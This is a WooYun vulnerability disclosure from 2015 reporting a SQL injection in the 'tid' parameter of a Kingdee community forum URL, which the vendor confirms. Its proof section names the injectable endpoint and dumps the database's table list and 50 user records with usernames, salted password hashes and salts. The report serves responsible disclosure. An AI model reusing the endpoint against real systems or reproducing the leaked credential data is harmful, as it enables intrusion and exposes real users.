当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139523

漏洞标题:金蝶某站SQL注入(影响五十多万注册用户信息)

相关厂商:金蝶

漏洞作者: 深度安全实验室

提交时间:2015-09-07 14:48

修复时间:2015-10-23 08:52

公开时间:2015-10-23 08:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-07: 细节已通知厂商并且等待厂商处理中
2015-09-08: 厂商已经确认,细节仅向厂商公开
2015-09-18: 细节向核心白帽子及相关领域专家公开
2015-09-28: 细节向普通白帽子公开
2015-10-08: 细节向实习白帽子公开
2015-10-23: 细节向公众公开

简要描述:

如题

详细说明:

金蝶社区如下链接存在SQL注入,其中,tid参数存在注入

http://club.kingdee.com/forum.php?action=recommend&do=subtract&hash=8e01bc2c&mod=misc&tid=1

13.png

漏洞证明:

14.png


50多万用户敏感信息泄露,包括:用户名、密码、邮箱等

Database: supesite
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| kuc_members | 529708 | 论坛注册用户
| tmp2_kuc_members | 484253 |
| tmp_kuc_members | 484252 |
| kuc_memberfields | 482718 |
| u_member | 429765 |
| ee_group_poll_log | 339672 |
| ee_group_flower_log | 203568 |
| tmp_members | 61336 |
| kuc_pms | 42036 |
| kuc_pm_indexes | 13329 |
| kuc_pm_members | 12587 |
| ee_group_fans | 11615 |
| tmp2_pm_members | 10170 |
| tmp_pm_members | 10170 |

Database: supesite
Table: kuc_members
[50 entries]
+-----+---------------+----------------------------------+-------------------------------+--------+------------+
| uid | username | password | email | salt | regdate |
+-----+---------------+----------------------------------+-------------------------------+--------+------------+
| 1 | wubeiwa | b4bc96a64647d1fc7bda747250156d8b | [email protected] | 538497 | 1190797740 |
| 2 | sky_tian | 697c66efff64abb8a328140d6544a1bc | [email protected] | 669280 | 1190797818 |
| 3 | 追日 | 6fc1ceed6f8ffa91db1dd881fcc6dcb0 | [email protected] | 315183 | 1190799240 |
| 4 | 萧秋水 | 37a02effb1e1840ef53122d8bbc3fafd | [email protected] | 420052 | 1190870919 |
| 5 | emil | 2664890388119c5f51719c9e3ae323c8 | [email protected] | 638340 | 1190896371 |
| 6 | yuanquan | d0a91e6aa3211d06193a453510e04db3 | [email protected] | 939290 | 1190896458 |
| 7 | 心中巅峰 | 40afded8ff2771b280aaba3f69936a10 | [email protected] | 468816 | 1190940116 |
| 8 | kathiebb | 8c27b726f9f8565facbe6ef5cd173d65 | [email protected] | 932980 | 1190941025 |
| 9 | 流沙 | de9b92ddc34e8fc210be0b50ae2a2e0e | [email protected] | 545223 | 1190941376 |
| 10 | zero | 4dfd9dff0d5d746f02e727bb73e81956 | [email protected] | 265328 | 1190947393 |
| 11 | ABC666 | 853bacf838688fb20648c9911f9303fb | [email protected] | 282029 | 1190949540 |
| 12 | wolfchen | 9ae190b942110a4ae92fac6d4556b7e6 | [email protected] | 531849 | 1190964387 |
| 13 | wu_zhongshan | 1d56bb36229cd604e4ff18aed23a1f18 | [email protected] | 935073 | 1190965173 |
| 14 | 笨不?不笨 | bdef7fa971f84d39ae0152af73711c80 | [email protected] | 112861 | 1190965327 |
| 15 | seanyuan | b9fbe4046a39ac706ab528662f230c1f | [email protected] | 539368 | 1190972650 |
| 16 | 夜荷 | 4c0db9b945453ce35883a75d72468987 | [email protected] | 391666 | 1191026360 |
| 17 | 沈胜衣 | f44c4e9eacdee5c38adf1eda4debb5c4 | [email protected] | 446332 | 1191034170 |
| 18 | www001 | 8acff206e4dd360054e046877dd22911 | [email protected] | 988183 | 1191184966 |
| 19 | 盘古 | cabcb0fca897588b1a978798ffe5a92d | [email protected] | 840734 | 1191796925 |
| 20 | kdservice | 634e655c973e035de7d9e33f63124dc4 | [email protected] | 664122 | 1191926696 |
| 21 | 雨人 | 48a37d853970ba0026b9029e0e01c1ed | [email protected] | 972259 | 1191937666 |
| 22 | 仙人掌 | e03cd0cf2f87d23f0d2c61673b1dd0d1 | [email protected] | 327305 | 1191963476 |
| 23 | ogre_hui | 2f4d7893db2f4633f74a6b45e6b7872f | [email protected] | 675524 | 1192220914 |
| 24 | kingdeexh | 5ca3412cd982985c6a30a30b808fb147 | [email protected] | 513471 | 1192267945 |
| 25 | robert | 628beaef3af1365b973c503ad6e30c3c | [email protected] | 389789 | 1192360602 |
| 26 | cathylee99 | c3ee627439a96a364bb023ca9f4c8282 | [email protected] | 753209 | 1192361008 |
| 27 | xiaoqs | 050ec3f5151f0c53cc770dfe71af1b01 | [email protected] | 674115 | 1192371758 |
| 28 | yuanquan3 | d3d2efba3827e93d841a980fcbca3e0d | [email protected] | 468234 | 1192374475 |
| 29 | hyy2007 | ae0494c47e317cc1bcf3a4cf14e0c591 | [email protected] | 126292 | 1192439210 |
| 30 | 200701kingdee | 066ace71313e98ec506d4e8df2fb53fa | [email protected] | 245308 | 1192440140 |
| 31 | SAMCUI | bc119c90745555cfc62204bff4fc2017 | [email protected] | 946216 | 1192458817 |
| 32 | Brandon | 60f792da92cf1f32dcb26999bff79a65 | [email protected] | 493484 | 1192493372 |
| 33 | luoxing9 | 8d18fbb27b43e0b3df71a60ca7e5d77e | [email protected] | 814589 | 1192547433 |
| 34 | 龙九 | 82f04590f5352d31cad913b9b5222bb3 | [email protected] | 261399 | 1192553198 |
| 35 | ddos | 5b05f836932697fe0fc036a21e09214c | [email protected] | 813536 | 1192559236 |
| 36 | kdclub1 | 576b7dd884df87ce1ca115e1ae3f4bdd | [email protected] | 452929 | 1192618284 |
| 37 | 逍遥哥哥 | 9a0414463a3b955e2c02cc7e1a18089c | [email protected] | 200690 | 1192619280 |
| 38 | xuzhenqiu | 61140daef66df979e0e90f7af3fb9b49 | [email protected] | 282352 | 1192633187 |
| 39 | 霓裳 | 673be8a398b04cfe41119e27cdb343b8 | [email protected] | 385909 | 1192633915 |
| 40 | 笛澈 | 84996464aacc7184e744f70ec1ff69a5 | [email protected] | 645914 | 1192636772 |
| 41 | dfggfg | e2e2f06b61fefd0276886a99a91cb9c3 | [email protected] | 447681 | 1192637660 |
| 42 | 楚云飞 | d59fd6eb2673c4ad4a0618e27952f821 | [email protected] | 567938 | 1192637724 |
| 43 | vswhb4321 | 9a47570d1607bc64ba0de4d54b12896d | [email protected] | 177764 | 1192716526 |
| 44 | 荷马 | 8ae5009e778f92f81f4da40103b78fc7 | [email protected] | 382754 | 1192717486 |
| 45 | zz123 | cabac34610d5be9c1867cda2c95d6b06 | [email protected] | 580800 | 1192729220 |
| 46 | 管理员-Felix | 5243b975a291f1fb11faf1a2e4c99ec2 | [email protected] | 617132 | 1192787168 |
| 47 | lidongfei | 5211250a6a83458d9b799e1435c27395 | [email protected] | 674420 | 1192788042 |
| 48 | lxf1001 | a8b70cb09fe9611afb83e0217b418418 | [email protected] | 927132 | 1192793255 |
| 49 | testnew | ebd9ad5ac63ab4222bc556191547693a | [email protected] | 605316 | 1192800567 |
| 50 | lixuefen | 673d76a1e0f8109df2f490626fab26f7 | [email protected] | 515155 | 1192801116 |
+-----+---------------+----------------------------------+-------------------------------+--------+------------+


修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-09-08 08:50

厂商回复:

谢谢对金蝶安全的关注,我们已通知相关部门处理。

最新状态:

暂无